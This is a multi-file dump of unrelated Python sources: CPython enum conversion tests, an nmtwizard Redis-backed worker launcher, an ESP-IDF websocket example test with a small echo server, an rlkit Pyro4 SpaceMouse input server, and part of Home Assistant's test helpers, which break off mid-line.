CheckedColor, SimpleColor, ) class CheckedMissing(IntFlag, boundary=KEEP): SIXTY_FOUR = 64 ONE_TWENTY_EIGHT = 128 TWENTY_FORTY_EIGHT = 2048 ALL = 2048 + 128 + 64 + 12 CM = CheckedMissing self.assertEqual(list(CheckedMissing), [CM.SIXTY_FOUR, CM.ONE_TWENTY_EIGHT, CM.TWENTY_FORTY_EIGHT]) # @_simple_enum(IntFlag, boundary=KEEP) class Missing: SIXTY_FOUR = 64 ONE_TWENTY_EIGHT = 128 TWENTY_FORTY_EIGHT = 2048 ALL = 2048 + 128 + 64 + 12 M = Missing self.assertEqual(list(CheckedMissing), [M.SIXTY_FOUR, M.ONE_TWENTY_EIGHT, M.TWENTY_FORTY_EIGHT]) # _test_simple_enum(CheckedMissing, Missing) class MiscTestCase(unittest.TestCase): def test__all__(self): support.check__all__(self, enum, not_exported={'bin', 'show_flag_values'}) # These are unordered here on purpose to ensure that declaration order # makes no difference. CONVERT_TEST_NAME_D = 5 CONVERT_TEST_NAME_C = 5 CONVERT_TEST_NAME_B = 5 CONVERT_TEST_NAME_A = 5 # This one should sort first. CONVERT_TEST_NAME_E = 5 CONVERT_TEST_NAME_F = 5 CONVERT_STRING_TEST_NAME_D = 5 CONVERT_STRING_TEST_NAME_C = 5 CONVERT_STRING_TEST_NAME_B = 5 CONVERT_STRING_TEST_NAME_A = 5 # This one should sort first. CONVERT_STRING_TEST_NAME_E = 5 CONVERT_STRING_TEST_NAME_F = 5 # We also need values that cannot be compared: UNCOMPARABLE_A = 5 UNCOMPARABLE_C = (9, 1) # naming order is broken on purpose UNCOMPARABLE_B = 'value' COMPLEX_C = 1j COMPLEX_A = 2j COMPLEX_B = 3j class TestIntEnumConvert(unittest.TestCase): def setUp(self): # Reset the module-level test variables to their original integer # values, otherwise the already created enum values get converted # instead. for suffix in ['A', 'B', 'C', 'D', 'E', 'F']: globals()[f'CONVERT_TEST_NAME_{suffix}'] = 5 globals()[f'CONVERT_STRING_TEST_NAME_{suffix}'] = 5 def test_convert_value_lookup_priority(self): test_type = enum.IntEnum._convert_( 'UnittestConvert', MODULE, filter=lambda x: x.startswith('CONVERT_TEST_')) # We don't want the reverse lookup value to vary when there are # multiple possible names for a given value. It should always # report the first lexigraphical name in that case. self.assertEqual(test_type(5).name, 'CONVERT_TEST_NAME_A') def test_convert(self): test_type = enum.IntEnum._convert_( 'UnittestConvert', MODULE, filter=lambda x: x.startswith('CONVERT_TEST_')) # Ensure that test_type has all of the desired names and values. self.assertEqual(test_type.CONVERT_TEST_NAME_F, test_type.CONVERT_TEST_NAME_A) self.assertEqual(test_type.CONVERT_TEST_NAME_B, 5) self.assertEqual(test_type.CONVERT_TEST_NAME_C, 5) self.assertEqual(test_type.CONVERT_TEST_NAME_D, 5) self.assertEqual(test_type.CONVERT_TEST_NAME_E, 5) # Ensure that test_type only picked up names matching the filter. self.assertEqual([name for name in dir(test_type) if name[0:2] not in ('CO', '__') and name not in dir(IntEnum)], [], msg='Names other than CONVERT_TEST_* found.') def test_convert_uncomparable(self): uncomp = enum.Enum._convert_( 'Uncomparable', MODULE, filter=lambda x: x.startswith('UNCOMPARABLE_'), ) # Should be ordered by `name` only: self.assertEqual( list(uncomp), [uncomp.UNCOMPARABLE_A, uncomp.UNCOMPARABLE_B, uncomp.UNCOMPARABLE_C], ) def test_convert_complex(self): uncomp = enum.Enum._convert_( 'Uncomparable', MODULE, filter=lambda x: x.startswith('COMPLEX_'), ) # Should be ordered by `name` only: self.assertEqual( list(uncomp), [uncomp.COMPLEX_A, uncomp.COMPLEX_B, uncomp.COMPLEX_C], ) @unittest.skipUnless(python_version == (3, 8), '_convert was deprecated in 3.8') def test_convert_warn(self): with self.assertWarns(DeprecationWarning): enum.IntEnum._convert( 'UnittestConvert', MODULE, filter=lambda x: x.startswith('CONVERT_TEST_')) @unittest.skipUnless(python_version >= (3, 9), '_convert was removed in 3.9') def test_convert_raise(self): with self.assertRaises(AttributeError): enum.IntEnum._convert( 'UnittestConvert', MODULE, filter=lambda x: x.startswith('CONVERT_TEST_')) def test_convert_repr_and_str(self): test_type = enum.IntEnum._convert_( 'UnittestConvert', MODULE, filter=lambda x: x.startswith('CONVERT_STRING_TEST_')) self.assertEqual(repr(test_type.CONVERT_STRING_TEST_NAME_A), '%s.CONVERT_STRING_TEST_NAME_A' % SHORT_MODULE) self.assertEqual(str(test_type.CONVERT_STRING_TEST_NAME_A), 'CONVERT_STRING_TEST_NAME_A') self.assertEqual(format(test_type.CONVERT_STRING_TEST_NAME_A), '5') # global names for StrEnum._convert_ test CONVERT_STR_TEST_2 = 'goodbye' CONVERT_STR_TEST_1 = 'hello' class TestStrEnumConvert(unittest.TestCase): def setUp(self): global CONVERT_STR_TEST_1 global CONVERT_STR_TEST_2 CONVERT_STR_TEST_2 = 'goodbye' CONVERT_STR_TEST_1 = 'hello' def test_convert(self): test_type = enum.StrEnum._convert_( 'UnittestConvert', MODULE, filter=lambda x: x.startswith('CONVERT_STR_')) # Ensure that test_type has all of the desired names and values. self.assertEqual(test_type.CONVERT_STR_TEST_1, 'hello') self.assertEqual(test_type.CONVERT_STR_TEST_2, 'goodbye') # Ensure that test_type only picked up names matching the filter. self.assertEqual([name for name in dir(test_type) if name[0:2] not in ('CO', '__') and name not in dir(StrEnum)], [], msg='Names other than CONVERT_STR_* found.') def test_convert_repr_and_str(self): test_type = enum.StrEnum._convert_( 'UnittestConvert', MODULE, filter=lambda x: x.startswith('CONVERT_STR_')) self.assertEqual(repr(test_type.CONVERT_STR_TEST_1), '%s.CONVERT_STR_TEST_1' % SHORT_MODULE) self.assertEqual(str(test_type.CONVERT_STR_TEST_2), 'goodbye') self.assertEqual(format(test_type.CONVERT_STR_TEST_1), 'hello') if __name__ == '__main__': unittest.main()
worker.py
import logging.config import time import os import sys import argparse import signal from multiprocessing import Process import six from nmtwizard import configuration as config, task, workeradmin from nmtwizard.worker import Worker from nmtwizard.worker_butler import WorkerButler from utils.database_utils import DatabaseUtils parser = argparse.ArgumentParser() parser.add_argument('service_name', type=str, help="Name of service") args = parser.parse_args() service_name = args.service_name assert service_name, "Name of service mustn't None" def get_logger(logger_config): logger_config["version"] = 1 logging.config.dictConfig(logger_config) return logging.getLogger("worker") system_config = config.get_system_config() mongo_client = DatabaseUtils.get_mongo_client(system_config) redis_db = DatabaseUtils.get_redis_client(system_config) base_config = config.process_base_config(mongo_client) service_config = config.get_service_config(mongo_client, service_name) assert "default" in system_config, "Can't read default config from settings.yaml" system_config_default = system_config["default"] assert 'logging' in system_config, "Can't read logging config from settings.yaml" logger = get_logger(system_config["logging"]) process_count = 1 worker_cycle = 0.05 worker_butler_cycle = 0.5 if "worker" in service_config and "process_count" in service_config["worker"]: process_count_config = service_config["worker"]["process_count"] assert isinstance(process_count_config, int), "number_of_workers config must be integer" process_count = process_count_config if "worker" in service_config and "worker_cycle" in service_config["worker"]: worker_cycle_config = service_config["worker"]["worker_cycle"] assert isinstance(worker_cycle_config, float) and worker_cycle_config > 0, "worker/worker_cycle must be numeric and greater than 0" worker_cycle = worker_cycle_config if "worker" in service_config and "worker_butler_cycle" in service_config["worker"]: worker_butler_cycle_config = service_config["worker"]["worker_butler_cycle"] assert isinstance(worker_butler_cycle_config, float) and worker_butler_cycle_config > 0, "worker/worker_butler_cycle must be numeric and greater than 0" worker_butler_cycle = worker_butler_cycle_config retry = 0 while retry < 10: try: # make sure notify events are set redis_db.config_set('notify-keyspace-events', 'Klgx') break except ConnectionError as e: retry += 1 logger.warning("cannot connect to redis DB - retrying (%d)", retry) time.sleep(1) assert retry < 10, "Cannot connect to redis DB - aborting" services, merged_config = config.load_service_config(service_config, base_config) assert len(services) == 1, "workers are now dedicated to one single service" service = next(iter(services)) pid = os.getpid() logger.info('Running worker for %s - PID = %d' % (service, pid)) instance_id = 'admin:worker:%s:%d' % (service, pid) redis_db.hset(instance_id, "launch_time", time.time()) redis_db.hset(instance_id, "beat_time", time.time()) redis_db.expire(instance_id, 600) keys = 'admin:services' redis_db.sadd(keys, service) def graceful_exit(signum, frame): logger.info('received interrupt - stopping') redis_db.delete(instance_id) sys.exit(0) signal.signal(signal.SIGTERM, graceful_exit) signal.signal(signal.SIGINT, graceful_exit) # define ttl policy for a task def ttl_policy(task_map): s = task_map['service'] if s is not None and s in services and 'ttl_policy' in services[s]._config: for ttl_rule in services[s]._config['ttl_policy']: match = True for p, v in six.iteritems(ttl_rule['pattern']): match = p in task_map and task_map[p] == v if not match: break if match: return ttl_rule['ttl'] return 0 def reorganize_data(): logger.debug(f"[{service}-{pid}]: Reorganizing data") remove_queued_tasks() reorganize_tasks() reorganize_resources() def remove_queued_tasks(): logger.debug(f"[{service}-{pid}]: Removing queued tasks") for key in redis_db.keys('queued:%s' % service): redis_db.delete(key) def reorganize_tasks(): logger.debug(f"[{service}-{pid}]: Reorganizing tasks") # On startup, add all active tasks in the work queue or service queue for task_id in task.list_active(redis_db, service): task_key = f'task:{task_id}' with redis_db.acquire_lock(task_id): status = redis_db.hget(task_key, 'status') if status in ['queued', 'allocated']: task.service_queue(redis_db, task_id, service) task.set_status(redis_db, 'task:' + task_id, 'queued') else: task.work_queue(redis_db, task_id, service) # check integrity of tasks if redis_db.hget(task_key, 'priority') is None: redis_db.hset(task_key, 'priority', 0) if redis_db.hget(task_key, 'queued_time') is None: redis_db.hset(task_key, 'queued_time', time.time()) def reorganize_resources(): logger.debug(f"[{service}-{pid}]: Reorganizing resources") if services[service].valid: # Deallocate all resources that are not anymore associated to a running task resources = services[service].list_resources() # TODO: # if multiple workers are for same service with different configurations # or storage definition change - restart all workers` cleanup_list_resource() for resource in resources: declare_resource(resource) reorganize_reserved_resource(resource) def cleanup_list_resource(): logger.debug(f"[{service}-{pid}]: Cleaning up list resource") redis_db.delete('admin:resources:' + service) def declare_resource(resource): logger.debug(f"[{service}-{pid}]: Declaring resource {resource}") redis_db.lpush('admin:resources:' + service, resource) def reorganize_reserved_resource(resource): logger.debug(f"[{service}-{pid}]: Reorganizing reserved resource {resource}") reorganize_reserved_gpu_resource(resource) reorganize_reserved_cpu_resource(resource) def reorganize_reserved_gpu_resource(resource): key = 'gpu_resource:%s:%s' % (service, resource) reorganize_reserved_resource_by_key(key) def reorganize_reserved_cpu_resource(resource): key = 'cpu_resource:%s:%s' % (service, resource) reorganize_reserved_resource_by_key(key) def reorganize_reserved_resource_by_key(key): running_tasks = redis_db.hgetall(key) for reserved_resource, task_id in six.iteritems(running_tasks): with redis_db.acquire_lock(task_id): status = redis_db.hget('task:' + task_id, 'status') if status not in ['running', 'terminating']: redis_db.hdel(key, reserved_resource) reorganize_data() worker_processes = [] worker_butler_process = Process() PROCESS_CHECK_INTERVAL = 3 WORKER_ADMIN_CHECK_INTERVAL = 1 HEART_BEAT_CHECK_INTERVAL = 10 def start(): start_all() count = 0 while True: count += 1 if count % PROCESS_CHECK_INTERVAL == 0 and is_any_process_stopped(): logger.debug(f"[{service}-{pid}]: Any process has stopped") restart_all() continue # Currently, WORKER_ADMIN_CHECK_INTERVAL = 1, can ignore this condition if count % WORKER_ADMIN_CHECK_INTERVAL == 0: process_worker_admin_command() if count % HEART_BEAT_CHECK_INTERVAL == 0: process_heart_beat() if count % (PROCESS_CHECK_INTERVAL * WORKER_ADMIN_CHECK_INTERVAL * HEART_BEAT_CHECK_INTERVAL) == 0: count = 0 time.sleep(1) def is_any_process_stopped(): for worker_process in worker_processes: if not worker_process.is_alive(): logger.debug(f"Worker {worker_process.pid} has stopped") return True if not worker_butler_process.is_alive(): logger.debug("Worker butler has stopped") return True def restart_all(): kill_all() worker_processes.clear() reorganize_data() start_all() def kill_all(): for worker_process in worker_processes: if worker_process.is_alive(): logger.debug(f"[{service}-{pid}]: Killing worker {worker_process.pid}") worker_process.terminate() if worker_butler_process.is_alive(): logger.debug(f"[{service}-{pid}]: Killing worker butler") worker_butler_process.terminate() def start_all(): logger.debug(f"[{service}-{pid}]: Starting worker butler") global worker_butler_process worker_butler_process = Process(target=start_worker_butler, args=(redis_db, services, pid, worker_butler_cycle)) worker_butler_process.daemon = True worker_butler_process.start() logger.debug(f"[{service}-{pid}]: Starting {process_count} workers") for i in range(0, process_count): mongodb_client = DatabaseUtils.get_mongo_client(system_config) worker_process = Process(target=start_worker, args=(redis_db, mongodb_client, services, ttl_policy, system_config_default["refresh_counter"], system_config_default["quarantine_time"], instance_id, system_config_default["taskfile_dir"], worker_cycle)) worker_process.daemon = True worker_process.start() worker_processes.append(worker_process) def start_worker(redis_db, mongodb_client, services, ttl_policy, refresh_counter, quarantine_time, instance_id, taskfile_dir, worker_cycle): worker = Worker(redis_db, mongodb_client, services, ttl_policy, refresh_counter, quarantine_time, instance_id, taskfile_dir, worker_cycle) worker.run() def start_worker_butler(redis_db, services, instance_id, worker_butler_cycle): worker_butler = WorkerButler(redis_db, services, instance_id, worker_butler_cycle) worker_butler.run() def process_worker_admin_command(): workeradmin.process(logger, redis_db, service, instance_id) def process_heart_beat(): if not is_exists_heart_beat(): logger.info('stopped by key expiration/removal') sys.exit(0) set_heart_beat_is_current_time() set_expire_time_of_instance(1200) def is_exists_heart_beat(): return redis_db.exists(instance_id) def set_heart_beat_is_current_time(): redis_db.hset(instance_id, "beat_time", time.time()) def set_expire_time_of_instance(time_in_sec): redis_db.expire(instance_id, time_in_sec) start()
example_test.py
from __future__ import print_function from __future__ import unicode_literals import re import os import socket import select import hashlib import base64 import queue import random import string from threading import Thread, Event import ttfw_idf def get_my_ip(): s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) try: # doesn't even have to be reachable s.connect(('10.255.255.255', 1)) IP = s.getsockname()[0] except Exception: IP = '127.0.0.1' finally: s.close() return IP # Simple Websocket server for testing purposes class Websocket: HEADER_LEN = 6 def __init__(self, port): self.port = port self.socket = socket.socket() self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) self.socket.settimeout(10.0) self.send_q = queue.Queue() self.shutdown = Event() self.conn = None def __enter__(self): try: self.socket.bind(('', self.port)) except socket.error as e: print("Bind failed:{}".format(e)) raise self.socket.listen(1) self.server_thread = Thread(target=self.run_server) self.server_thread.start() return self def __exit__(self, exc_type, exc_value, traceback): self.shutdown.set() self.server_thread.join() self.socket.close() if self.conn: self.conn.close() def run_server(self): self.conn, address = self.socket.accept() # accept new connection self.socket.settimeout(10.0) print("Connection from: {}".format(address)) self.establish_connection() print("WS established") # Handle connection until client closes it, will echo any data received and send data from send_q queue self.handle_conn() def establish_connection(self): while not self.shutdown.is_set(): try: # receive data stream. it won't accept data packet greater than 1024 bytes data = self.conn.recv(1024).decode() if not data: # exit if data is not received raise if "Upgrade: websocket" in data and "Connection: Upgrade" in data: self.handshake(data) return except socket.error as err: print("Unable to establish a websocket connection: {}".format(err)) raise def handshake(self, data): # Magic string from RFC MAGIC_STRING = "258EAFA5-E914-47DA-95CA-C5AB0DC85B11" headers = data.split("\r\n") for header in headers: if "Sec-WebSocket-Key" in header: client_key = header.split()[1] if client_key: resp_key = client_key + MAGIC_STRING resp_key = base64.standard_b64encode(hashlib.sha1(resp_key.encode()).digest()) resp = "HTTP/1.1 101 Switching Protocols\r\n" + \ "Upgrade: websocket\r\n" + \ "Connection: Upgrade\r\n" + \ "Sec-WebSocket-Accept: {}\r\n\r\n".format(resp_key.decode()) self.conn.send(resp.encode()) def handle_conn(self): while not self.shutdown.is_set(): r,w,e = select.select([self.conn], [], [], 1) try: if self.conn in r: self.echo_data() if not self.send_q.empty(): self._send_data_(self.send_q.get()) except socket.error as err: print("Stopped echoing data: {}".format(err)) raise def echo_data(self): header = bytearray(self.conn.recv(self.HEADER_LEN, socket.MSG_WAITALL)) if not header: # exit if socket closed by peer return # Remove mask bit payload_len = ~(1 << 7) & header[1] payload = bytearray(self.conn.recv(payload_len, socket.MSG_WAITALL)) if not payload: # exit if socket closed by peer return frame = header + payload decoded_payload = self.decode_frame(frame) print("Sending echo...") self._send_data_(decoded_payload) def _send_data_(self, data): frame = self.encode_frame(data) self.conn.send(frame) def send_data(self, data): self.send_q.put(data.encode()) def decode_frame(self, frame): # Mask out MASK bit from payload length, this len is only valid for short messages (<126) payload_len = ~(1 << 7) & frame[1] mask = frame[2:self.HEADER_LEN] encrypted_payload = frame[self.HEADER_LEN:self.HEADER_LEN + payload_len] payload = bytearray() for i in range(payload_len): payload.append(encrypted_payload[i] ^ mask[i % 4]) return payload def encode_frame(self, payload): # Set FIN = 1 and OP_CODE = 1 (text) header = (1 << 7) | (1 << 0) frame = bytearray([header]) payload_len = len(payload) # If payload len is longer than 125 then the next 16 bits are used to encode length if payload_len > 125: frame.append(126) frame.append(payload_len >> 8) frame.append(0xFF & payload_len) else: frame.append(payload_len) frame += payload return frame def test_echo(dut): dut.expect("WEBSOCKET_EVENT_CONNECTED") for i in range(0, 10): dut.expect(re.compile(r"Received=hello (\d)"), timeout=30) print("All echos received") def test_recv_long_msg(dut, websocket, msg_len, repeats): send_msg = ''.join(random.choice(string.ascii_uppercase + string.ascii_lowercase + string.digits) for _ in range(msg_len)) for _ in range(repeats): websocket.send_data(send_msg) recv_msg = '' while len(recv_msg) < msg_len: # Filter out color encoding match = dut.expect(re.compile(r"Received=([a-zA-Z0-9]*).*\n"), timeout=30)[0] recv_msg += match if recv_msg == send_msg: print("Sent message and received message are equal") else: raise ValueError("DUT received string do not match sent string, \nexpected: {}\nwith length {}\ \nreceived: {}\nwith length {}".format(send_msg, len(send_msg), recv_msg, len(recv_msg))) @ttfw_idf.idf_example_test(env_tag="Example_WIFI") def test_examples_protocol_websocket(env, extra_data): """ steps: 1. join AP 2. connect to uri specified in the config 3. send and receive data """ dut1 = env.get_dut("websocket", "examples/protocols/websocket", dut_class=ttfw_idf.ESP32DUT) # check and log bin size binary_file = os.path.join(dut1.app.binary_path, "websocket-example.bin") bin_size = os.path.getsize(binary_file) ttfw_idf.log_performance("websocket_bin_size", "{}KB".format(bin_size // 1024)) ttfw_idf.check_performance("websocket_bin_size", bin_size // 1024, dut1.TARGET) try: if "CONFIG_WEBSOCKET_URI_FROM_STDIN" in dut1.app.get_sdkconfig(): uri_from_stdin = True else: uri = dut1.app.get_sdkconfig()["CONFIG_WEBSOCKET_URI"].strip('"') uri_from_stdin = False except Exception: print('ENV_TEST_FAILURE: Cannot find uri settings in sdkconfig') raise # start test dut1.start_app() if uri_from_stdin: server_port = 4455 with Websocket(server_port) as ws: uri = "ws://{}:{}".format(get_my_ip(), server_port) print("DUT connecting to {}".format(uri)) dut1.expect("Please enter uri of websocket endpoint", timeout=30) dut1.write(uri) test_echo(dut1) # Message length should exceed DUT's buffer size to test fragmentation, default is 1024 byte test_recv_long_msg(dut1, ws, 2000, 3) else: print("DUT connecting to {}".format(uri)) test_echo(dut1) if __name__ == '__main__': test_examples_protocol_websocket()
input_server.py
# Copyright 2021 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # first to start the nameserver start: python -m Pyro4.naming import Pyro4 from threading import Thread import time import numpy as np from rlkit.launchers import conf as config Pyro4.config.SERIALIZERS_ACCEPTED = set(['pickle','json', 'marshal', 'serpent']) Pyro4.config.SERIALIZER='pickle' device_state = None @Pyro4.expose class DeviceState(object): state = None def get_state(self): return device_state def set_state(self, state): global device_state device_state = state class SpaceMouseExpert: def __init__( self, xyz_dims=3, xyz_remap=[0, 1, 2], xyz_scale=[1, 1, 1], xyz_abs_threshold=0.0, rot_dims=3, rot_remap=[0, 1, 2], rot_scale=[1, 1, 1], rot_abs_threshold=0.0, rot_discrete=False, min_clip=-np.inf, max_clip=np.inf ): """TODO: fill in other params""" self.xyz_dims = xyz_dims self.xyz_remap = np.array(xyz_remap) self.xyz_scale = np.array(xyz_scale) self.xyz_abs_threshold = xyz_abs_threshold self.rot_dims = rot_dims self.rot_remap = rot_remap self.rot_scale = rot_scale self.rot_abs_threshold = rot_abs_threshold self.rot_discrete = rot_discrete self.min_clip = min_clip self.max_clip = max_clip self.thread = Thread(target = start_server) self.thread.daemon = True self.thread.start() self.device_state = DeviceState() def get_action(self, obs): """Must return (action, valid, reset, accept)""" state = self.device_state.get_state() # time.sleep(0.1) if state is None: return None, False, False, False dpos, rotation, roll, pitch, yaw, accept, reset = ( state["dpos"], state["rotation"], state["roll"], state["pitch"], state["yaw"], state["grasp"], #["left_click"], state["reset"], #["right_click"], ) xyz = dpos[self.xyz_remap] xyz[np.abs(xyz) < self.xyz_abs_threshold] = 0.0 xyz = xyz * self.xyz_scale xyz = np.clip(xyz, self.min_clip, self.max_clip) rot = np.array([roll, pitch, yaw]) rot[np.abs(rot) < self.rot_abs_threshold] = 0.0 if self.rot_discrete: max_i = np.argmax(np.abs(rot)) for i in range(len(rot)): if i != max_i: rot[i] = 0.0 rot = rot * self.rot_scale rot = np.clip(rot, self.min_clip, self.max_clip) a = np.concatenate([xyz[:self.xyz_dims], rot[:self.rot_dims]]) valid = not np.all(np.isclose(a, 0)) # print(a, roll, pitch, yaw, valid) return (a, valid, reset, accept) def start_server(): daemon = Pyro4.Daemon(config.SPACEMOUSE_HOSTNAME) ns = Pyro4.locateNS() # find the name server uri = daemon.register(DeviceState) # register the greeting maker as a Pyro object ns.register("example.greeting", uri) # register the object with a name in the name server print("uri:", uri) print("Server ready.") daemon.requestLoop() # start the event loop of the server to wait for calls if __name__ == "__main__": expert = SpaceMouseExpert() for i in range(100): time.sleep(1) print(expert.get_action(None))
common.py
"""Test the helper method for writing tests.""" import asyncio import collections from collections import OrderedDict from contextlib import contextmanager from datetime import timedelta import functools as ft from io import StringIO import json import logging import os import sys import threading import time import uuid from aiohttp.test_utils import unused_port as get_test_instance_port # noqa from homeassistant import auth, config_entries, core as ha, loader from homeassistant.auth import ( auth_store, models as auth_models, permissions as auth_permissions, providers as auth_providers, ) from homeassistant.auth.permissions import system_policies from homeassistant.components import recorder from homeassistant.components.device_automation import ( # noqa: F401 _async_get_device_automation_capabilities as async_get_device_automation_capabilities, _async_get_device_automations as async_get_device_automations, ) from homeassistant.components.mqtt.models import Message from homeassistant.config import async_process_component_config from homeassistant.const import ( ATTR_DISCOVERED, ATTR_SERVICE, DEVICE_DEFAULT_NAME, EVENT_HOMEASSISTANT_CLOSE, EVENT_PLATFORM_DISCOVERED, EVENT_STATE_CHANGED, EVENT_TIME_CHANGED, STATE_OFF, STATE_ON, ) from homeassistant.core import State from homeassistant.helpers import ( area_registry, device_registry, entity, entity_platform, entity_registry, intent, restore_state, storage, ) from homeassistant.helpers.json import JSONEncoder from homeassistant.setup import setup_component from homeassistant.util.async_ import run_callback_threadsafe import homeassistant.util.dt as date_util from homeassistant.util.unit_system import METRIC_SYSTEM import homeassistant.util.yaml.loader as yaml_loader from tests.async_mock import AsyncMock, Mock, patch _LOGGER = logging.getLogger(__name__) INSTANCES = [] CLIENT_ID = "https://example.com/app" CLIENT_REDIRECT_URI = "https://example.com/app/callback" def threadsafe_callback_factory(func): """Create threadsafe functions out of callbacks. Callback needs to have `hass` as first argument. """ @ft.wraps(func) def threadsafe(*args, **kwargs): """Call func threadsafe.""" hass = args[0] return run_callback_threadsafe( hass.loop, ft.partial(func, *args, **kwargs) ).result() return threadsafe def threadsafe_coroutine_factory(func): """Create threadsafe functions out of coroutine. Callback needs to have `hass` as first argument. """ @ft.wraps(func) def threadsafe(*args, **kwargs): """Call func threadsafe.""" hass = args[0] return asyncio.run_coroutine_threadsafe( func(*args, **kwargs), hass.loop ).result() return threadsafe def get_test_config_dir(*add_path): """Return a path to a test config dir.""" return os.path.join(os.path.dirname(__file__), "testing_config", *add_path) def get_test_home_assistant(): """Return a Home Assistant object pointing at test config directory.""" if sys.platform == "win32": loop = asyncio.ProactorEventLoop() else: loop = asyncio.new_event_loop() asyncio.set_event_loop(loop) hass = loop.run_until_complete(async_test_home_assistant(loop)) stop_event = threading.Event() def run_loop(): """Run event loop.""" # pylint: disable=protected-access loop._thread_ident = threading.get_ident() loop.run_forever() stop_event.set() orig_stop = hass.stop def start_hass(*mocks): """Start hass.""" asyncio.run_coroutine_threadsafe(hass.async_start(), loop).result() def stop_hass(): """Stop hass.""" orig_stop() stop_event.wait() loop.close() hass.start = start_hass hass.stop = stop_hass threading.Thread(name="LoopThread", target=run_loop, daemon=False).start() return hass # pylint: disable=protected-access async def async_test_home_assistant(loop): """Return a Home Assistant object pointing at test config dir.""" hass = ha.HomeAssistant() store = auth_store.AuthStore(hass) hass.auth = auth.AuthManager(hass, store, {}, {}) ensure_auth_manager_loaded(hass.auth) INSTANCES.append(hass) orig_async_add_job = hass.async_add_job orig_async_add_executor_job = hass.async_add_executor_job orig_async_create_task = hass.async_create_task def async_add_job(target, *args): """Add job.""" check_target = target while isinstance(check_target, ft.partial): check_target = check_target.func if isinstance(check_target, Mock) and not isinstance(target, AsyncMock): fut = asyncio.Future() fut.set_result(target(*args)) return fut return orig_async_add_job(target, *args) def async_add_executor_job(target, *args): """Add executor job.""" check_target = target while isinstance(check_target, ft.partial): check_target = check_target.func if isinstance(check_target, Mock): fut = asyncio.Future() fut.set_result(target(*args)) return fut return orig_async_add_executor_job(target, *args) def async_create_task(coroutine): """Create task.""" if isinstance(coroutine, Mock) and not isinstance(coroutine, AsyncMock): fut = asyncio.Future() fut.set_result(None) return fut return orig_async_create_task(coroutine) hass.async_add_job = async_add_job hass.async_add_executor_job = async_add_executor_job hass.async_create_task = async_create_task hass.config.location_name = "test home" hass.config.config_dir = get_test_config_dir() hass.config.latitude = 32.87336 hass.config.longitude = -117.22743 hass.config.elevation = 0 hass.config.time_zone = date_util.get_time_zone("US/Pacific") hass.config.units = METRIC_SYSTEM hass.config.media_dirs = {"local": get_test_config_dir("media")} hass.config.skip_pip = True hass.config.legacy_templates = False hass.config_entries = config_entries.ConfigEntries(hass, {}) hass.config_entries._entries = [] hass.config_entries._store._async_ensure_stop_listener = lambda: None hass.state = ha.CoreState.running # Mock async_start orig_start = hass.async_start async def mock_async_start(): """Start the mocking.""" # We only mock time during tests and we want to track tasks with patch("homeassistant.core._async_create_timer"), patch.object( hass, "async_stop_track_tasks" ): await orig_start() hass.async_start = mock_async_start @ha.callback def clear_instance(event): """Clear global instance.""" INSTANCES.remove(hass) hass.bus.async_listen_once(EVENT_HOMEASSISTANT_CLOSE, clear_instance) return hass def async_mock_service(hass, domain, service, schema=None): """Set up a fake service & return a calls log list to this service.""" calls = [] @ha.callback def mock_service_log(call): # pylint: disable=unnecessary-lambda """Mock service call.""" calls.append(call) hass.services.async_register(domain, service, mock_service_log, schema=schema) return calls mock_service = threadsafe_callback_factory(async_mock_service) @ha.callback def async_mock_intent(hass, intent_typ): """Set up a fake intent handler.""" intents = [] class MockIntentHandler(intent.IntentHandler): intent_type = intent_typ async def async_handle(self, intent): """Handle the intent.""" intents.append(intent) return intent.create_response() intent.async_register(hass, MockIntentHandler()) return intents @ha.callback def async_fire_mqtt_message(hass, topic, payload, qos=0, retain=False): """Fire the MQTT message.""" if isinstance(payload, str): payload = payload.encode("utf-8") msg = Message(topic, payload, qos, retain) hass.data["mqtt"]._mqtt_handle_message(msg) fire_mqtt_message = threadsafe_callback_factory(async_fire_mqtt_message) @ha.callback def async_fire_time_changed(hass, datetime_, fire_all=False): """Fire a time changes event.""" hass.bus.async_fire(EVENT_TIME_CHANGED, {"now": date_util.as_utc(datetime_)}) for task in list(hass.loop._scheduled): if not isinstance(task, asyncio.TimerHandle): continue if task.cancelled(): continue mock_seconds_into_future = datetime_.timestamp() - time.time() future_seconds = task.when() - hass.loop.time() if fire_all or mock_seconds_into_future >= future_seconds: with patch( "homeassistant.helpers.event.time_tracker_utcnow", return_value=date_util.as_utc(datetime_), ): task._run() task.cancel() fire_time_changed = threadsafe_callback_factory(async_fire_time_changed) def fire_service_discovered(hass, service, info): """Fire the MQTT message.""" hass.bus.fire( EVENT_PLATFORM_DISCOVERED, {ATTR_SERVICE: service, ATTR_DISCOVERED: info} ) @ha.callback def async_fire_service_discovered(hass, service, info): """Fire the MQTT message.""" hass.bus.async_fire( EVENT_PLATFORM_DISCOVERED, {ATTR_SERVICE: service, ATTR_DISCOVERED: info} ) def load_fixture(filename): """Load a fixture.""" path = os.path.join(os.path.dirname(__file__), "fixtures", filename) with open(path, encoding="utf-8") as fptr: return fptr.read() def mock_state_change_event(hass, new_state, old_state=None): """Mock state change envent.""" event_data = {"entity_id": new_state.entity_id, "new_state": new_state} if old_state: event_data["old_state"] = old_state hass.bus.fire(EVENT_STATE_CHANGED, event_data, context=new_state.context) @ha.callback def mock_component(hass, component): """Mock a component is setup.""" if component in hass.config.components: AssertionError(f"Integration {component} is already setup") hass.config.components.add(component) def mock_registry(hass, mock_entries=None): """Mock the Entity Registry.""" registry = entity_registry.EntityRegistry(hass) registry.entities = mock_entries or OrderedDict() registry._rebuild_index() hass.data[entity_registry.DATA_REGISTRY] = registry return registry def mock_area_registry(hass, mock_entries=None): """Mock the Area Registry.""" registry = area_registry.AreaRegistry(hass) registry.areas = mock_entries or OrderedDict() hass.data[area_registry.DATA_REGISTRY] = registry return registry def mock_device_registry(hass, mock_entries=None, mock_deleted_entries=None): """Mock the Device Registry.""" registry = device_registry.DeviceRegistry(hass) registry.devices = mock_entries or OrderedDict() registry.deleted_devices = mock_deleted_entries or OrderedDict() registry._rebuild_index() hass.data[device_registry.DATA_REGISTRY] = registry return registry class MockGroup(auth_models.Group): """Mock a group in Home Assistant.""" def __init__(self, id=None, name="Mock Group", 